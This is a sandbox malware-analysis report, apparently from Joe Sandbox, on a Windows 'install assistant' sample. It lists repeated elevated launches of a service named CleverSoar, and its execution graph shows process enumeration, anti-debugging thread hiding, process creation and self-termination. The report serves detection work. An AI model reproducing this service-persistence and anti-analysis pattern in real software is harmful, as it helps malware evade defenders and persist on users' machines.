                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6b71c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:08:36:44
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:08:36:44
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:271
                            Start time:08:36:55
                            Start date:24/12/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false


                              Execution Graph

                              Execution Coverage:1.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15%
                              Total number of Nodes:833
                              Total number of Limit Nodes:9
94228->94146 94231 6c915fcc 94232 6c7b7090 77 API calls 94231->94232 94232->94221 94233->94137 94235 6c915810 std::locale::_Setgloballocale 94234->94235 94236 6c915890 Process32NextW 94235->94236 94237 6c9157e7 CloseHandle 94235->94237 94238 6c915921 94235->94238 94239 6c9158b5 Process32FirstW 94235->94239 94236->94235 94237->94235 94238->94066 94239->94235 94240->94083 94242->94064 94244 6c8ebcb3 _Yarn __wsopen_s std::locale::_Setgloballocale 94243->94244 94245 6c8ec6f0 94244->94245 94246 6c8ec25d CreateFileA 94244->94246 94248 6c8eafa0 94244->94248 94245->94206 94246->94244 94249 6c8eafb3 __wsopen_s std::locale::_Setgloballocale 94248->94249 94250 6c8eb959 WriteFile 94249->94250 94251 6c8eb9ad WriteFile 94249->94251 94252 6c8ebc88 94249->94252 94253 6c8eb105 ReadFile 94249->94253 94250->94249 94251->94249 94252->94244 94253->94249 94255 6c916595 94254->94255 94256 6c7e2020 52 API calls 94255->94256 94257 6c916636 94256->94257 94258 6c916fb3 std::_Facet_Register 4 API calls 94257->94258 94259 6c91666e 94258->94259 94260 6c917897 43 API calls 94259->94260 94261 6c916682 94260->94261 94262 6c7e1d90 89 API calls 94261->94262 94263 6c91672b 94262->94263 94264 6c91675c 94263->94264 94306 6c7e2250 30 API calls 94263->94306 94264->94219 94266 6c916796 94307 6c7e26e0 24 API calls 4 library calls 94266->94307 94268 6c9167a8 94308 6c9198e9 RaiseException 94268->94308 94270 6c9167bd 94271 6c7de010 67 API calls 94270->94271 94272 6c9167cf 94271->94272 94272->94219 94274 6c9168fd 94273->94274 94309 6c916b10 94274->94309 94276 6c9169ec 94276->94227 94279 6c916915 94279->94276 94327 6c7e2250 30 API calls 94279->94327 94328 6c7e26e0 24 API calls 4 library calls 94279->94328 94329 6c9198e9 RaiseException 94279->94329 94282 6c7f23af 94281->94282 94285 6c7f23c3 94282->94285 94338 6c7e3560 32 API calls std::_Xinvalid_argument 94282->94338 94287 6c7f247e 94285->94287 94340 6c7e2250 30 API calls 94285->94340 94341 6c7e26e0 24 API calls 4 library calls 94285->94341 94342 6c9198e9 
RaiseException 94285->94342 94290 6c7f2491 94287->94290 94339 6c7e37e0 32 API calls std::_Xinvalid_argument 94287->94339 94290->94227 94292 6c91610e 94291->94292 94295 6c916141 94291->94295 94293 6c7e01f0 64 API calls 94292->94293 94296 6c916134 94293->94296 94294 6c9161f3 94294->94231 94295->94294 94343 6c7e2250 30 API calls 94295->94343 94297 6c921088 67 API calls 94296->94297 94297->94295 94299 6c91621e 94344 6c7e2340 24 API calls 94299->94344 94301 6c91622e 94345 6c9198e9 RaiseException 94301->94345 94303 6c916239 94304 6c7de010 67 API calls 94303->94304 94305 6c916292 std::ios_base::_Ios_base_dtor 94304->94305 94305->94231 94306->94266 94307->94268 94308->94270 94310 6c916b78 94309->94310 94311 6c916b4c 94309->94311 94317 6c916b89 94310->94317 94330 6c7e3560 32 API calls std::_Xinvalid_argument 94310->94330 94312 6c916b71 94311->94312 94332 6c7e2250 30 API calls 94311->94332 94312->94279 94315 6c916d58 94333 6c7e2340 24 API calls 94315->94333 94317->94312 94331 6c7e2f60 42 API calls 4 library calls 94317->94331 94318 6c916d67 94334 6c9198e9 RaiseException 94318->94334 94321 6c916bc3 94321->94312 94335 6c7e2250 30 API calls 94321->94335 94323 6c916d97 94336 6c7e2340 24 API calls 94323->94336 94325 6c916dad 94337 6c9198e9 RaiseException 94325->94337 94327->94279 94328->94279 94329->94279 94330->94317 94331->94321 94332->94315 94333->94318 94334->94321 94335->94323 94336->94325 94337->94312 94338->94285 94339->94290 94340->94285 94341->94285 94342->94285 94343->94299 94344->94301 94345->94303 94346 6c793d62 94348 6c793bc0 94346->94348 94347 6c793e8a GetCurrentThread NtSetInformationThread 94349 6c793eea 94347->94349 94348->94347 94350 6c7a4a27 94352 6c7a4a5d _strlen 94350->94352 94351 6c7b639e 94441 6c9206a0 18 API calls 2 library calls 94351->94441 94352->94351 94353 6c7a5b58 94352->94353 94354 6c7a5b6f 94352->94354 94358 6c7a5b09 _Yarn 94352->94358 94355 6c916fb3 std::_Facet_Register 4 API calls 94353->94355 94356 6c916fb3 std::_Facet_Register 4 API calls 
94354->94356 94355->94358 94356->94358 94359 6c90b430 FindFirstFileA 94358->94359 94361 6c7a5bad std::ios_base::_Ios_base_dtor 94359->94361 94360 6c915560 4 API calls 94370 6c7a61cb _strlen 94360->94370 94361->94351 94361->94360 94364 6c7a9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 94361->94364 94362 6c916fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 94362->94364 94363 6c90b430 FindFirstFileA 94363->94364 94364->94351 94364->94362 94364->94363 94365 6c7aa292 Sleep 94364->94365 94385 6c7ae619 94364->94385 94382 6c7a9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 94365->94382 94366 6c7a660d 94368 6c916fb3 std::_Facet_Register 4 API calls 94366->94368 94367 6c7a6624 94369 6c916fb3 std::_Facet_Register 4 API calls 94367->94369 94377 6c7a65bc _Yarn _strlen 94368->94377 94369->94377 94370->94351 94370->94366 94370->94367 94370->94377 94371 6c7a9bbd GetCurrentProcess TerminateProcess 94371->94364 94372 6c7b63b2 94442 6c7915e0 18 API calls std::ios_base::_Ios_base_dtor 94372->94442 94374 6c7b64f8 94375 6c7a6989 94379 6c916fb3 std::_Facet_Register 4 API calls 94375->94379 94376 6c7a6970 94378 6c916fb3 std::_Facet_Register 4 API calls 94376->94378 94377->94372 94377->94375 94377->94376 94380 6c7a6920 _Yarn 94377->94380 94378->94380 94379->94380 94381 6c915ed0 104 API calls 94380->94381 94386 6c7a69d6 std::ios_base::_Ios_base_dtor _strlen 94381->94386 94382->94351 94382->94364 94382->94371 94382->94372 94391 6c915ed0 104 API calls 94382->94391 94437 6c916fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 94382->94437 94440 6c915560 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 94382->94440 94383 6c7af243 CreateFileA 94394 6c7af2a7 94383->94394 94384 6c7b02ca 94385->94383 94386->94351 94387 6c7a6dbb 94386->94387 94388 6c7a6dd2 94386->94388 94397 6c7a6d69 _Yarn _strlen 94386->94397 94389 6c916fb3 std::_Facet_Register 4 API calls 94387->94389 
94390 6c916fb3 std::_Facet_Register 4 API calls 94388->94390 94389->94397 94390->94397 94391->94382 94392 6c7a7440 94396 6c916fb3 std::_Facet_Register 4 API calls 94392->94396 94393 6c7a7427 94395 6c916fb3 std::_Facet_Register 4 API calls 94393->94395 94394->94384 94400 6c7b02ac GetCurrentProcess TerminateProcess 94394->94400 94398 6c7a73da _Yarn 94395->94398 94396->94398 94397->94372 94397->94392 94397->94393 94397->94398 94399 6c915ed0 104 API calls 94398->94399 94401 6c7a748d std::ios_base::_Ios_base_dtor _strlen 94399->94401 94400->94384 94401->94351 94402 6c7a79a8 94401->94402 94403 6c7a7991 94401->94403 94410 6c7a7940 _Yarn _strlen 94401->94410 94405 6c916fb3 std::_Facet_Register 4 API calls 94402->94405 94404 6c916fb3 std::_Facet_Register 4 API calls 94403->94404 94404->94410 94405->94410 94406 6c7a7dc9 94408 6c916fb3 std::_Facet_Register 4 API calls 94406->94408 94407 6c7a7de2 94409 6c916fb3 std::_Facet_Register 4 API calls 94407->94409 94411 6c7a7d7c _Yarn 94408->94411 94409->94411 94410->94372 94410->94406 94410->94407 94410->94411 94412 6c915ed0 104 API calls 94411->94412 94413 6c7a7e2f std::ios_base::_Ios_base_dtor _strlen 94412->94413 94413->94351 94414 6c7a85a8 94413->94414 94415 6c7a85bf 94413->94415 94423 6c7a8556 _Yarn _strlen 94413->94423 94416 6c916fb3 std::_Facet_Register 4 API calls 94414->94416 94417 6c916fb3 std::_Facet_Register 4 API calls 94415->94417 94416->94423 94417->94423 94418 6c7a896a 94420 6c916fb3 std::_Facet_Register 4 API calls 94418->94420 94419 6c7a8983 94421 6c916fb3 std::_Facet_Register 4 API calls 94419->94421 94422 6c7a891d _Yarn 94420->94422 94421->94422 94424 6c915ed0 104 API calls 94422->94424 94423->94372 94423->94418 94423->94419 94423->94422 94425 6c7a89d0 std::ios_base::_Ios_base_dtor _strlen 94424->94425 94425->94351 94426 6c7a8f1f 94425->94426 94427 6c7a8f36 94425->94427 94430 6c7a8ecd _Yarn _strlen 94425->94430 94428 6c916fb3 std::_Facet_Register 4 API calls 94426->94428 94429 6c916fb3 std::_Facet_Register 4 API 
calls 94427->94429 94428->94430 94429->94430 94430->94372 94431 6c7a936d 94430->94431 94432 6c7a9354 94430->94432 94435 6c7a9307 _Yarn 94430->94435 94434 6c916fb3 std::_Facet_Register 4 API calls 94431->94434 94433 6c916fb3 std::_Facet_Register 4 API calls 94432->94433 94433->94435 94434->94435 94436 6c915ed0 104 API calls 94435->94436 94439 6c7a93ba std::ios_base::_Ios_base_dtor 94436->94439 94437->94382 94438 6c915560 4 API calls 94438->94364 94439->94351 94439->94438 94440->94382 94442->94374 94443 6c91f4af 94444 6c91f4bb __wsopen_s 94443->94444 94445 6c91f4c2 GetLastError ExitThread 94444->94445 94446 6c91f4cf 94444->94446 94447 6c924f22 __Getctype 37 API calls 94446->94447 94448 6c91f4d4 94447->94448 94455 6c92a2d6 94448->94455 94452 6c91f4eb 94461 6c91f41a 16 API calls 2 library calls 94452->94461 94454 6c91f50d 94456 6c92a2e8 GetPEB 94455->94456 94458 6c91f4df 94455->94458 94457 6c92a2fb 94456->94457 94456->94458 94462 6c927388 5 API calls std::_Lockit::_Lockit 94457->94462 94458->94452 94460 6c9272df 5 API calls std::_Lockit::_Lockit 94458->94460 94460->94452 94461->94454 94462->94458
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 50568539d288e4e284b55d20e075d3551ad31bc7f9459f0818c25dcf33fb235d
                              • Instruction ID: 0c86a7a443c9626eb8d002194fa21df653e628cc25f46bb0f660ac28c2ab2f37
                              • Opcode Fuzzy Hash: 50568539d288e4e284b55d20e075d3551ad31bc7f9459f0818c25dcf33fb235d
                              • Instruction Fuzzy Hash: 7574F471644B018FC728CF28C9D0A95B7F3FF95318B198B6DC0AA8BA55E774B54ACB40
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: 2f461a43ea50fb4e366f32944c68fc3800b3923372ad133bbd27f26f19e20dbd
                              • Instruction ID: 8e05774fdc1d61e7e1526b388d637fd29221061d10061466f9699507d4fd7a48
                              • Opcode Fuzzy Hash: 2f461a43ea50fb4e366f32944c68fc3800b3923372ad133bbd27f26f19e20dbd
                              • Instruction Fuzzy Hash: 04342771644B018FC728CF68C9D0A96B7E3EF95318B198B6DC0A64BB55EB34B54BCB40

                              Control-flow Graph

                              control_flow_graph 7677 6c9157b0-6c9157e5 CreateToolhelp32Snapshot 7678 6c915810-6c915819 7677->7678 7679 6c915850-6c915855 7678->7679 7680 6c91581b-6c915820 7678->7680 7683 6c9158e7-6c915911 call 6c923175 7679->7683 7684 6c91585b-6c915860 7679->7684 7681 6c915822-6c915827 7680->7681 7682 6c915885-6c91588a 7680->7682 7688 6c9158a4-6c9158cd call 6c91be90 Process32FirstW 7681->7688 7689 6c915829-6c91582e 7681->7689 7685 6c915890-6c9158a2 Process32NextW 7682->7685 7686 6c915916-6c91591b 7682->7686 7683->7678 7690 6c915862-6c915867 7684->7690 7691 6c9157e7-6c915802 CloseHandle 7684->7691 7692 6c9158d2-6c9158e2 7685->7692 7686->7678 7695 6c915921-6c91592f 7686->7695 7688->7692 7689->7678 7696 6c915830-6c915841 7689->7696 7690->7678 7697 6c915869-6c915883 7690->7697 7691->7678 7692->7678 7696->7678 7697->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C9157BE
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: e0d4a6d5b9ebca8f6b90ff349d3223dfd23a6d64904769e9ee5586ad3c04433b
                              • Instruction ID: 8474e393df009516b6f48d6d31aedd2e046fb4b63b4a03f840aecbdb75c6c14c
                              • Opcode Fuzzy Hash: e0d4a6d5b9ebca8f6b90ff349d3223dfd23a6d64904769e9ee5586ad3c04433b
